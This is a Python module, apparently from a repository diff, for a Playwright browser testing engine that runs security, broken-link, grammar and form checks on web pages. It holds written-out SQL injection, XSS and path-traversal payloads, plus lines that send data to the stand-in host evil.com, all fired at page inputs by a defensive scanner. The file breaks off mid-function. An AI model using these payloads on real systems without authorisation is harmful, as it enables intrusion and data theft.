|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Advanced Testing Module
|
| 3 |
+
=================================================================
|
| 4 |
+
|
| 5 |
+
Advanced testing capabilities including security testing, broken URL detection,
|
| 6 |
+
grammatical error checking, and intelligent form testing.
|
| 7 |
+
|
| 8 |
+
Author: Mejbaur Bahar Fagun
|
| 9 |
+
Role: Software Engineer in Test
|
| 10 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 11 |
+
"""
|
| 12 |
+
|
| 13 |
+
import asyncio
|
| 14 |
+
import re
|
| 15 |
+
import random
|
| 16 |
+
import string
|
| 17 |
+
import requests
|
| 18 |
+
from typing import List, Dict, Any, Optional, Tuple
|
| 19 |
+
from playwright.async_api import Page, Locator
|
| 20 |
+
import logging
|
| 21 |
+
from dataclasses import dataclass
|
| 22 |
+
from enum import Enum
|
| 23 |
+
|
| 24 |
+
logger = logging.getLogger(__name__)
|
| 25 |
+
|
| 26 |
+
|
| 27 |
+
class TestType(Enum):
    """Types of tests that can be performed by the testing engine."""
    SECURITY = "security"  # injection probes (SQLi, XSS, CSRF, path traversal payloads)
    FUNCTIONALITY = "functionality"  # general functional checks
    BROKEN_URL = "broken_url"  # broken/unreachable link detection
    GRAMMAR = "grammar"  # grammatical error checking of page text
    FORM_TESTING = "form_testing"  # form input validation with canned test data
    PERFORMANCE = "performance"  # performance-oriented checks
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
@dataclass
class TestResult:
    """Result of a single test execution."""
    test_type: TestType  # category of the test (see TestType)
    test_name: str  # human-readable test identifier
    status: str  # "PASSED", "FAILED", "WARNING"
    description: str  # what the test checked / what was observed
    details: Dict[str, Any]  # structured evidence backing the status
    recommendations: List[str]  # suggested follow-up actions
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
class AdvancedTestingEngine:
|
| 49 |
+
"""Advanced testing engine with AI thinking capabilities."""
|
| 50 |
+
|
| 51 |
+
def __init__(self):
    """Initialize the engine with empty results and preloaded test fixtures."""
    # Accumulates a TestResult for every executed test.
    self.test_results: List[TestResult] = []
    # Static fixture data used by the individual test routines.
    self.security_payloads = self._load_security_payloads()
    self.form_test_data = self._load_form_test_data()
    self.grammar_rules = self._load_grammar_rules()
|
| 56 |
+
|
| 57 |
+
def _load_security_payloads(self) -> Dict[str, List[str]]:
    """Return canned attack strings grouped by vulnerability class."""
    sql_injection = [
        "' OR '1'='1",
        "'; DROP TABLE users; --",
        "' UNION SELECT * FROM users --",
        "admin'--",
        "admin'/*",
        "' OR 1=1#",
        "' OR 'x'='x",
        "') OR ('1'='1",
        "1' OR '1'='1' AND '1'='1",
        "1' OR '1'='1' LIMIT 1 --",
    ]
    xss = [
        "<script>alert('XSS')</script>",
        "<img src=x onerror=alert('XSS')>",
        "javascript:alert('XSS')",
        "<svg onload=alert('XSS')>",
        "<iframe src=javascript:alert('XSS')></iframe>",
        "<body onload=alert('XSS')>",
        "<input onfocus=alert('XSS') autofocus>",
        "<select onfocus=alert('XSS') autofocus>",
        "<textarea onfocus=alert('XSS') autofocus>",
        "<keygen onfocus=alert('XSS') autofocus>",
    ]
    csrf = [
        "<form action='http://evil.com/steal' method='POST'>",
        "<img src='http://evil.com/steal?data=secret'>",
        "<script>fetch('http://evil.com/steal', {method: 'POST', body: 'data=secret'})</script>",
    ]
    path_traversal = [
        "../../../etc/passwd",
        "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
        "....//....//....//etc/passwd",
        "..%2F..%2F..%2Fetc%2Fpasswd",
        "..%252F..%252F..%252Fetc%252Fpasswd",
    ]
    return {
        "sql_injection": sql_injection,
        "xss": xss,
        "csrf": csrf,
        "path_traversal": path_traversal,
    }
|
| 97 |
+
|
| 98 |
+
def _load_form_test_data(self) -> Dict[str, Dict[str, List[str]]]:
|
| 99 |
+
"""Load comprehensive form test data."""
|
| 100 |
+
return {
|
| 101 |
+
"email": {
|
| 102 |
+
"valid": [
|
| 103 |
+
"test@example.com",
|
| 104 |
+
"user.name@domain.co.uk",
|
| 105 |
+
"admin+test@company.org",
|
| 106 |
+
"valid.email@subdomain.example.com"
|
| 107 |
+
],
|
| 108 |
+
"invalid": [
|
| 109 |
+
"invalid-email",
|
| 110 |
+
"@domain.com",
|
| 111 |
+
"user@",
|
| 112 |
+
"user@domain",
|
| 113 |
+
"user..name@domain.com",
|
| 114 |
+
"user@.domain.com",
|
| 115 |
+
"user@domain..com"
|
| 116 |
+
],
|
| 117 |
+
"edge_cases": [
|
| 118 |
+
"a@b.c",
|
| 119 |
+
"test+tag@example.com",
|
| 120 |
+
"user123@test-domain.com",
|
| 121 |
+
"very.long.email.address@very.long.domain.name.com"
|
| 122 |
+
]
|
| 123 |
+
},
|
| 124 |
+
"password": {
|
| 125 |
+
"valid": [
|
| 126 |
+
"SecurePass123!",
|
| 127 |
+
"MyStr0ng#Password",
|
| 128 |
+
"ComplexP@ssw0rd",
|
| 129 |
+
"Safe123$Password"
|
| 130 |
+
],
|
| 131 |
+
"invalid": [
|
| 132 |
+
"123",
|
| 133 |
+
"password",
|
| 134 |
+
"12345678",
|
| 135 |
+
"qwerty",
|
| 136 |
+
"abc123",
|
| 137 |
+
"Password",
|
| 138 |
+
"password123"
|
| 139 |
+
],
|
| 140 |
+
"edge_cases": [
|
| 141 |
+
"a",
|
| 142 |
+
"a" * 100,
|
| 143 |
+
" ",
|
| 144 |
+
"password with spaces",
|
| 145 |
+
"password\twith\ttabs"
|
| 146 |
+
]
|
| 147 |
+
},
|
| 148 |
+
"phone": {
|
| 149 |
+
"valid": [
|
| 150 |
+
"+1234567890",
|
| 151 |
+
"123-456-7890",
|
| 152 |
+
"(123) 456-7890",
|
| 153 |
+
"+1-234-567-8900",
|
| 154 |
+
"123.456.7890"
|
| 155 |
+
],
|
| 156 |
+
"invalid": [
|
| 157 |
+
"123",
|
| 158 |
+
"abc-def-ghij",
|
| 159 |
+
"123-456-789",
|
| 160 |
+
"+12345678901234567890",
|
| 161 |
+
"123 456 789"
|
| 162 |
+
],
|
| 163 |
+
"edge_cases": [
|
| 164 |
+
"+1-234-567-8900 ext 123",
|
| 165 |
+
"123-456-7890 x123",
|
| 166 |
+
"+1 (234) 567-8900"
|
| 167 |
+
]
|
| 168 |
+
},
|
| 169 |
+
"name": {
|
| 170 |
+
"valid": [
|
| 171 |
+
"John Doe",
|
| 172 |
+
"Mary Jane Smith",
|
| 173 |
+
"José María",
|
| 174 |
+
"李小明",
|
| 175 |
+
"Jean-Pierre"
|
| 176 |
+
],
|
| 177 |
+
"invalid": [
|
| 178 |
+
"123",
|
| 179 |
+
"John123",
|
| 180 |
+
"John@Doe",
|
| 181 |
+
"John<script>",
|
| 182 |
+
""
|
| 183 |
+
],
|
| 184 |
+
"edge_cases": [
|
| 185 |
+
"John O'Connor",
|
| 186 |
+
"Mary-Jane Smith",
|
| 187 |
+
"José María de la Cruz",
|
| 188 |
+
"X Æ A-12"
|
| 189 |
+
]
|
| 190 |
+
},
|
| 191 |
+
"url": {
|
| 192 |
+
"valid": [
|
| 193 |
+
"https://example.com",
|
| 194 |
+
"http://test.org",
|
| 195 |
+
"https://subdomain.example.com/path",
|
| 196 |
+
"https://example.com:8080/path?query=value"
|
| 197 |
+
],
|
| 198 |
+
"invalid": [
|
| 199 |
+
"not-a-url",
|
| 200 |
+
"ftp://example.com",
|
| 201 |
+
"javascript:alert('xss')",
|
| 202 |
+
"data:text/html,<script>alert('xss')</script>"
|
| 203 |
+
],
|
| 204 |
+
"edge_cases": [
|
| 205 |
+
"https://example.com/",
|
| 206 |
+
"https://example.com/path/",
|
| 207 |
+
"https://example.com/path?query=&value=test"
|
| 208 |
+
]
|
| 209 |
+
}
|
| 210 |
+
}
|
| 211 |
+
|
| 212 |
+
def _load_grammar_rules(self) -> Dict[str, List[str]]:
|
| 213 |
+
"""Load grammar checking rules."""
|
| 214 |
+
return {
|
| 215 |
+
"common_errors": [
|
| 216 |
+
r"\b(its|it's)\b", # its vs it's
|
| 217 |
+
r"\b(there|their|they're)\b", # there/their/they're
|
| 218 |
+
r"\b(your|you're)\b", # your vs you're
|
| 219 |
+
r"\b(loose|lose)\b", # loose vs lose
|
| 220 |
+
r"\b(affect|effect)\b", # affect vs effect
|
| 221 |
+
r"\b(than|then)\b", # than vs then
|
| 222 |
+
r"\b(accept|except)\b", # accept vs except
|
| 223 |
+
r"\b(principal|principle)\b", # principal vs principle
|
| 224 |
+
r"\b(compliment|complement)\b", # compliment vs complement
|
| 225 |
+
r"\b(discreet|discrete)\b" # discreet vs discrete
|
| 226 |
+
],
|
| 227 |
+
"punctuation": [
|
| 228 |
+
r"[.!?]\s*[a-z]", # Missing capital after sentence
|
| 229 |
+
r"[a-z][A-Z]", # Missing space between words
|
| 230 |
+
r"\s+", # Multiple spaces
|
| 231 |
+
r"[^\w\s.,!?;:()\"'-]", # Invalid characters
|
| 232 |
+
],
|
| 233 |
+
"spelling": [
|
| 234 |
+
r"\b(recieve|recieved)\b", # receive
|
| 235 |
+
r"\b(seperate|seperated)\b", # separate
|
| 236 |
+
r"\b(definately|defiantly)\b", # definitely
|
| 237 |
+
r"\b(occured|occured)\b", # occurred
|
| 238 |
+
r"\b(neccessary|necesary)\b", # necessary
|
| 239 |
+
r"\b(accomodate|acommodate)\b", # accommodate
|
| 240 |
+
r"\b(embarass|embarras)\b", # embarrass
|
| 241 |
+
r"\b(maintainance|maintenence)\b", # maintenance
|
| 242 |
+
r"\b(priviledge|privilage)\b", # privilege
|
| 243 |
+
r"\b(occassion|ocasion)\b" # occasion
|
| 244 |
+
]
|
| 245 |
+
}
|
| 246 |
+
|
| 247 |
+
async def perform_security_testing(self, page: Page) -> List[TestResult]:
    """Run every security scanner against *page* and aggregate the findings.

    Executes, in order: SQL injection, XSS, CSRF, and path-traversal checks.
    """
    findings: List[TestResult] = []
    scanners = (
        self._test_sql_injection,        # error-message based SQLi probe
        self._test_xss_vulnerabilities,  # reflected-XSS probe
        self._test_csrf_vulnerabilities, # missing-token heuristic
        self._test_path_traversal,       # ../ file-disclosure probe
    )
    for scanner in scanners:
        findings.extend(await scanner(page))
    return findings
|
| 268 |
+
|
| 269 |
+
async def _test_sql_injection(self, page: Page) -> List[TestResult]:
    """Probe text-like inputs for SQL injection.

    Each payload is typed into each field and submitted with Enter; the
    resulting page HTML is scanned for database error signatures.

    Args:
        page: Playwright page to probe.

    Returns:
        One FAILED ``TestResult`` per (field, payload) that surfaced a
        database error message.
    """
    results = []

    # Error-message signatures indicating a backend SQL error leaked into the
    # response.  Hoisted out of the per-payload loop (previously this literal
    # was rebuilt on every iteration) and de-duplicated preserving
    # first-occurrence order, so the `error_message` reported for any given
    # page is unchanged.
    sql_error_signatures = [
        "mysql_fetch_array", "ORA-01756", "Microsoft OLE DB Provider",
        "SQLServer JDBC Driver", "PostgreSQL query failed", "Warning: mysql_",
        "valid MySQL result", "MySqlClient.", "SQL syntax", "mysql_num_rows",
        "mysql_query", "mysql_fetch_assoc", "mysql_fetch_row", "mysql_numrows",
        "mysql_close", "mysql_connect", "mysql_create_db", "mysql_data_seek",
        "mysql_db_name", "mysql_db_query", "mysql_drop_db", "mysql_errno",
        "mysql_error", "mysql_fetch_field", "mysql_fetch_lengths",
        "mysql_fetch_object", "mysql_fetch_result", "mysql_field_flags",
        "mysql_field_len", "mysql_field_name", "mysql_field_seek",
        "mysql_field_table", "mysql_field_type", "mysql_free_result",
        "mysql_get_client_info", "mysql_get_host_info", "mysql_get_proto_info",
        "mysql_get_server_info", "mysql_info", "mysql_insert_id",
        "mysql_list_dbs", "mysql_list_fields", "mysql_list_processes",
        "mysql_list_tables", "mysql_pconnect", "mysql_ping",
        "mysql_real_escape_string", "mysql_result", "mysql_select_db",
        "mysql_stat", "mysql_tablename", "mysql_thread_id",
        "mysql_unbuffered_query",
    ]

    try:
        # All text-accepting controls are candidates.
        inputs = await page.query_selector_all(
            'input[type="text"], input[type="email"], input[type="password"], textarea'
        )

        for input_field in inputs:
            for payload in self.security_payloads["sql_injection"]:
                try:
                    await input_field.fill(payload)
                    await page.keyboard.press('Enter')
                    await page.wait_for_timeout(1000)

                    # Lowercase once per payload instead of once per signature.
                    content = (await page.content()).lower()

                    for error in sql_error_signatures:
                        if error.lower() in content:
                            results.append(TestResult(
                                test_type=TestType.SECURITY,
                                test_name="SQL Injection Vulnerability",
                                status="FAILED",
                                description=f"SQL injection vulnerability detected with payload: {payload}",
                                details={
                                    "payload": payload,
                                    "error_message": error,
                                    "input_field": await input_field.get_attribute("name") or "unknown"
                                },
                                recommendations=[
                                    "Implement parameterized queries",
                                    "Use prepared statements",
                                    "Validate and sanitize all input",
                                    "Implement proper error handling"
                                ]
                            ))
                            break  # report only the first signature per payload

                    # Reset the field so the next payload starts clean.
                    await input_field.fill("")

                except Exception as e:
                    logger.warning(f"Error testing SQL injection: {e}")
                    continue

    except Exception as e:
        logger.error(f"Error in SQL injection testing: {e}")

    return results
|
| 376 |
+
|
| 377 |
+
async def _test_xss_vulnerabilities(self, page: Page) -> List[TestResult]:
    """Probe text-like inputs for reflected XSS.

    Each payload is typed into each field and submitted; if the raw payload
    string appears in the resulting HTML, the page echoed it without output
    encoding and a FAILED finding is recorded.
    """
    findings: List[TestResult] = []
    selector = 'input[type="text"], input[type="email"], input[type="password"], textarea'

    try:
        for field in await page.query_selector_all(selector):
            for attack in self.security_payloads["xss"]:
                try:
                    await field.fill(attack)
                    await page.keyboard.press('Enter')
                    await page.wait_for_timeout(1000)

                    # A payload echoed back verbatim implies missing encoding.
                    if attack in await page.content():
                        findings.append(TestResult(
                            test_type=TestType.SECURITY,
                            test_name="XSS Vulnerability",
                            status="FAILED",
                            description=f"XSS vulnerability detected with payload: {attack}",
                            details={
                                "payload": attack,
                                "input_field": await field.get_attribute("name") or "unknown",
                                "reflected": True
                            },
                            recommendations=[
                                "Implement proper input validation",
                                "Use output encoding",
                                "Implement Content Security Policy (CSP)",
                                "Sanitize user input before display"
                            ]
                        ))

                    # Clear the field before the next payload.
                    await field.fill("")
                except Exception as exc:
                    logger.warning(f"Error testing XSS: {exc}")
    except Exception as exc:
        logger.error(f"Error in XSS testing: {exc}")

    return findings
|
| 424 |
+
|
| 425 |
+
async def _test_csrf_vulnerabilities(self, page: Page) -> List[TestResult]:
    """Flag forms that carry no recognizable CSRF token field.

    Heuristic only: looks for a hidden input whose name contains "csrf",
    "token", or "_token"; forms without one get a WARNING finding.
    """
    findings: List[TestResult] = []
    token_selector = 'input[name*="csrf"], input[name*="token"], input[name*="_token"]'

    try:
        for form in await page.query_selector_all('form'):
            if await form.query_selector(token_selector):
                continue  # token present -> nothing to report

            findings.append(TestResult(
                test_type=TestType.SECURITY,
                test_name="CSRF Vulnerability",
                status="WARNING",
                description="Form lacks CSRF protection token",
                details={
                    "form_action": await form.get_attribute("action") or "unknown",
                    "csrf_token_present": False
                },
                recommendations=[
                    "Implement CSRF tokens",
                    "Use SameSite cookie attribute",
                    "Implement proper CSRF protection",
                    "Validate origin and referer headers"
                ]
            ))
    except Exception as exc:
        logger.error(f"Error in CSRF testing: {exc}")

    return findings
|
| 458 |
+
|
| 459 |
+
async def _test_path_traversal(self, page: Page) -> List[TestResult]:
    """Probe a ``file=`` query parameter for path traversal.

    Navigates to ``<base>?file=<payload>`` for each traversal payload and
    scans the 200-response body for /etc/passwd-style account entries, then
    returns to the original page.

    Args:
        page: Playwright page; its current URL is used as the probe base.

    Returns:
        One FAILED ``TestResult`` per payload that disclosed sensitive
        content.
    """
    results = []

    # "user:" prefixes that appear in a leaked /etc/passwd.  Hoisted out of
    # the per-payload loop (previously the literal was rebuilt on every
    # iteration) and de-duplicated preserving first-occurrence order, so the
    # first `sensitive_content` reported for a page is unchanged.
    sensitive_patterns = [
        "root:", "daemon:", "bin:", "sys:", "adm:", "tty:", "disk:", "lp:",
        "mail:", "news:", "uucp:", "man:", "proxy:", "kmem:", "dialout:",
        "fax:", "voice:", "cdrom:", "floppy:", "tape:", "sudo:", "audio:",
        "dip:", "www-data:", "backup:", "operator:", "list:", "irc:", "src:",
        "gnats:", "shadow:", "utmp:", "video:", "sasl:", "plugdev:", "staff:",
        "games:", "users:", "nogroup:", "systemd-journal:", "systemd-network:",
        "systemd-resolve:", "systemd-timesync:", "messagebus:", "syslog:",
        "_apt:", "tss:", "uuidd:", "tcpdump:", "landscape:", "pollinate:",
        "sshd:", "systemd-coredump:", "ubuntu:", "lxd:", "dnsmasq:",
        "libvirt-qemu:", "libvirt-dnsmasq:", "Debian-exim:", "statd:",
        "nobody:", "_rpc:", "colord:", "geoclue:", "pulse:", "rtkit:",
        "saned:", "usbmux:", "whoopsie:", "kernoops:", "speech-dispatcher:",
        "avahi:", "samba:", "lightdm:", "nvidia-persistenced:",
        "cups-pk-helper:", "hplip:", "gdm:", "gnome-initial-setup:",
    ]

    try:
        current_url = page.url
        base_url = current_url.split('?')[0]

        for payload in self.security_payloads["path_traversal"]:
            try:
                test_url = f"{base_url}?file={payload}"
                response = await page.goto(test_url)

                if response and response.status == 200:
                    content = await page.content()

                    for pattern in sensitive_patterns:
                        if pattern in content:
                            results.append(TestResult(
                                test_type=TestType.SECURITY,
                                test_name="Path Traversal Vulnerability",
                                status="FAILED",
                                description=f"Path traversal vulnerability detected with payload: {payload}",
                                details={
                                    "payload": payload,
                                    "test_url": test_url,
                                    "sensitive_content": pattern
                                },
                                recommendations=[
                                    "Implement proper input validation",
                                    "Use whitelist approach for file access",
                                    "Implement proper file path sanitization",
                                    "Use chroot or similar isolation techniques"
                                ]
                            ))
                            break  # report only the first leaked entry

                await page.goto(current_url)  # return to the original page

            except Exception as e:
                logger.warning(f"Error testing path traversal: {e}")
                continue

    except Exception as e:
        logger.error(f"Error in path traversal testing: {e}")

    return results
|
| 607 |
+
|
| 608 |
+
async def check_broken_urls(self, page: Page) -> List[TestResult]:
    """Validate every anchor href on the page.

    Site-relative links are resolved against the current origin; anchors and
    non-HTTP schemes are skipped.  Each remaining URL is fetched; >=400 is a
    FAILED "Broken URL", 3xx a WARNING "Redirect URL", and network failures a
    FAILED "Unreachable URL".

    NOTE(review): this performs blocking `requests.get` calls inside an
    async method, which stalls the event loop for up to 10s per link —
    confirm this is acceptable for the caller.
    """
    findings: List[TestResult] = []

    try:
        for anchor in await page.query_selector_all('a[href]'):
            href = await anchor.get_attribute('href')
            if not href:
                continue

            if href.startswith('/'):
                # Resolve site-relative links against the current origin.
                parts = page.url.split('/')
                href = f"{parts[0]}//{parts[2]}{href}"
            elif href.startswith('#'):
                continue  # in-page anchor
            elif not href.startswith('http'):
                continue  # mailto:, javascript:, etc.

            try:
                response = requests.get(href, timeout=10, allow_redirects=True)

                if response.status_code >= 400:
                    findings.append(TestResult(
                        test_type=TestType.BROKEN_URL,
                        test_name="Broken URL",
                        status="FAILED",
                        description=f"Broken URL found: {href}",
                        details={
                            "url": href,
                            "status_code": response.status_code,
                            "link_text": await anchor.inner_text() or "No text"
                        },
                        recommendations=[
                            "Fix the broken URL",
                            "Update the link to point to correct page",
                            "Implement proper error handling for broken links"
                        ]
                    ))
                elif response.status_code >= 300:
                    findings.append(TestResult(
                        test_type=TestType.BROKEN_URL,
                        test_name="Redirect URL",
                        status="WARNING",
                        description=f"URL redirects: {href}",
                        details={
                            "url": href,
                            "status_code": response.status_code,
                            "redirect_url": response.url,
                            "link_text": await anchor.inner_text() or "No text"
                        },
                        recommendations=[
                            "Consider updating the link to point directly to final destination",
                            "Ensure redirects are working correctly"
                        ]
                    ))
            except requests.exceptions.RequestException as exc:
                findings.append(TestResult(
                    test_type=TestType.BROKEN_URL,
                    test_name="Unreachable URL",
                    status="FAILED",
                    description=f"Unreachable URL: {href}",
                    details={
                        "url": href,
                        "error": str(exc),
                        "link_text": await anchor.inner_text() or "No text"
                    },
                    recommendations=[
                        "Check if the URL is correct",
                        "Verify the server is accessible",
                        "Implement proper error handling"
                    ]
                ))
    except Exception as exc:
        logger.error(f"Error checking broken URLs: {exc}")

    return findings
|
| 688 |
+
|
| 689 |
+
async def check_grammatical_errors(self, page: Page) -> List[TestResult]:
    """Scan visible text nodes against the loaded grammar rule sets.

    Text shorter than ~10 characters (after stripping) is ignored; each rule
    pattern that matches produces one WARNING finding with a text snippet
    and the matched substrings.
    """
    findings: List[TestResult] = []
    text_selector = 'p, h1, h2, h3, h4, h5, h6, span, div, li, td, th'

    try:
        for node in await page.query_selector_all(text_selector):
            text = await node.inner_text()
            if not text or len(text.strip()) <= 10:
                continue  # skip empty / trivially short fragments

            for rule_name, patterns in self.grammar_rules.items():
                for pattern in patterns:
                    hits = re.findall(pattern, text, re.IGNORECASE)
                    if not hits:
                        continue

                    snippet = text[:100] + "..." if len(text) > 100 else text
                    findings.append(TestResult(
                        test_type=TestType.GRAMMAR,
                        test_name=f"Grammar Issue - {rule_name}",
                        status="WARNING",
                        description=f"Potential grammar issue found: {hits[0]}",
                        details={
                            "text": snippet,
                            "rule_type": rule_name,
                            "pattern": pattern,
                            "matches": hits,
                            "element_tag": await node.evaluate("el => el.tagName")
                        },
                        recommendations=[
                            "Review the text for grammar errors",
                            "Use a grammar checking tool",
